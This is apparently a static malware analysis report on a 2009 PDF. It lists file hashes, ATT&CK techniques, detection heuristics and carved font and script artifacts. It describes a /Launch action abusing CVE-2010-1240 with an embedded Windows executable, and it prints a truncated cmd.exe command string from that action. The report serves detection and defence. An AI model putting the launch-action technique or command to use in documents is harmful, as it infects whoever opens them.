Malicious PDF — malware analysis report

Static analysis result for SHA-256 a457b0e6b6797715…

MALICIOUS

PDF

216.9 KB Created: 2009-09-26 07:34:11 +02:00 Authoring application: Writer (via OpenOffice.org 3.0)
MD5: 38f39b47cc60e4a140366494fb72c351 SHA-1: f49d544920ea059ee541220394c59bccc9f26bc1 SHA-256: a457b0e6b6797715e323a619f0313dcd8bbbadabc3b5636815beed19b0171dd8
324 Risk Score

Malware Insights

MITRE ATT&CK
T1204.002 Malicious File T1059.003 Windows Command Shell T1105 Ingress Tool Transfer

The PDF file contains embedded JavaScript and a launch action that executes cmd.exe with specific parameters. This indicates an attempt to exploit CVE-2010-1240 to download and execute a secondary payload. The embedded PE payload further supports this malicious intent. The specific command executed is: cmd.exe /Q /C %HOMEDRIVE%&cd %HOMEPATH%&(if exist "%USERPROFILE%\\����\\ADMPlugin.apl" (cd/D "%USERPROFILE%\\����".

Heuristics 8

  • Adobe Reader Launch action command execution critical CVE exact CVE_2010_1240
    PDF uses the Adobe Reader/Acrobat Launch action pattern associated with CVE-2010-1240: cmd.exe is invoked with attacker-controlled parameters, paired with an embedded/exported payload.
  • Launch action critical PDF_LAUNCH
    PDF contains a /Launch action whose target is an executable, URL, or UNC path — can start an external application
  • Embedded Windows executable payload in PDF stream critical PDF_EMBEDDED_PE_PAYLOAD
    PDF stream bytes contain an embedded Windows executable with a verified PE header. Exploit chains often hide droppers inside ordinary streams rather than standard /EmbeddedFile attachments.
  • /Launch action target: cmd.exe critical PDF_LAUNCH_COMMAND
    PDF /Launch action specifies an executable target with parameters '/Q /C %HOMEDRIVE%&cd %HOMEPATH%&(if exist "%USERPROFILE%\\����\\ADMPlugin.apl" (cd/D "%USERPROFILE%\\����"' — references a known-dangerous executable (cmd, PowerShell, etc.).
  • ClamAV: Pdf.Tool.Agent-1388586 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Tool.Agent-1388586
  • JavaScript action low PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload

Extracted artifacts 11

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0110_000.js
35efbffd979ea858d6d8f7921ee358ca428a1c5a5ff180aba705d55c1f85cc16		 pdf-javascript-stream PDF /JS object 110 at offset 0x35DEF 58 bytes
stream_035_off00035bfd.bin
c4fd9a56e98db7642397c747b99868e0056c40ee5a445a6e819900537db5d7d6		 decompressed-pdf-stream PDF FlateDecoded stream at offset 0x35BFD 38400 bytes
font_00_sfnt_off00018873.bin
f027842567b04c926ad746e8dfdc4f8cdd2e3c7e0220264a22bb516569de8c36		 pdf-font-stream PDF embedded font (sfnt) at offset 0x18873 39760 bytes
font_01_sfnt_off0001e18a.bin
da753cc0b5163c9b6666572dbeb35b7b5caf4a56d9c22c99c36835925c000a71		 pdf-font-stream PDF embedded font (sfnt) at offset 0x1E18A 33672 bytes
font_02_sfnt_off00023149.bin
23ac8feb518c8c727acc6a954bb623e333337c9458521aed483fcc8d89f418c1		 pdf-font-stream PDF embedded font (sfnt) at offset 0x23149 12752 bytes
font_03_sfnt_off0002558e.bin
c8fd7189737c38a43b9ba034337799f502028b5db5a6037bd1df4c486f3233e0		 pdf-font-stream PDF embedded font (sfnt) at offset 0x2558E 13136 bytes
font_04_sfnt_off00027bf4.bin
cf699c117fd0bb7368c625645b874f03c477a382b67075e98dd54d87de53958b		 pdf-font-stream PDF embedded font (sfnt) at offset 0x27BF4 27096 bytes
font_05_sfnt_off0002ca67.bin
34829650519fe758a893e02057f5c7c1070378add027225386180ba60993be24		 pdf-font-stream PDF embedded font (sfnt) at offset 0x2CA67 13700 bytes
font_06_sfnt_off0002f2cf.bin
bf36ecd37d117b665b1c68abb1c41fbb1a9d46c2c583bdb8512681835e553b91		 pdf-font-stream PDF embedded font (sfnt) at offset 0x2F2CF 14892 bytes
font_07_sfnt_off00031db2.bin
37478039963094b7b89fb24df19adb1f5ee171f766ade680ac5516bb23ede59f		 pdf-font-stream PDF embedded font (sfnt) at offset 0x31DB2 13576 bytes
font_08_sfnt_off00033c21.bin
df903f2017d43426972294ce96b065da76255f4a0de84e466c7a4dd6181632c2		 pdf-font-stream PDF embedded font (sfnt) at offset 0x33C21 1780 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.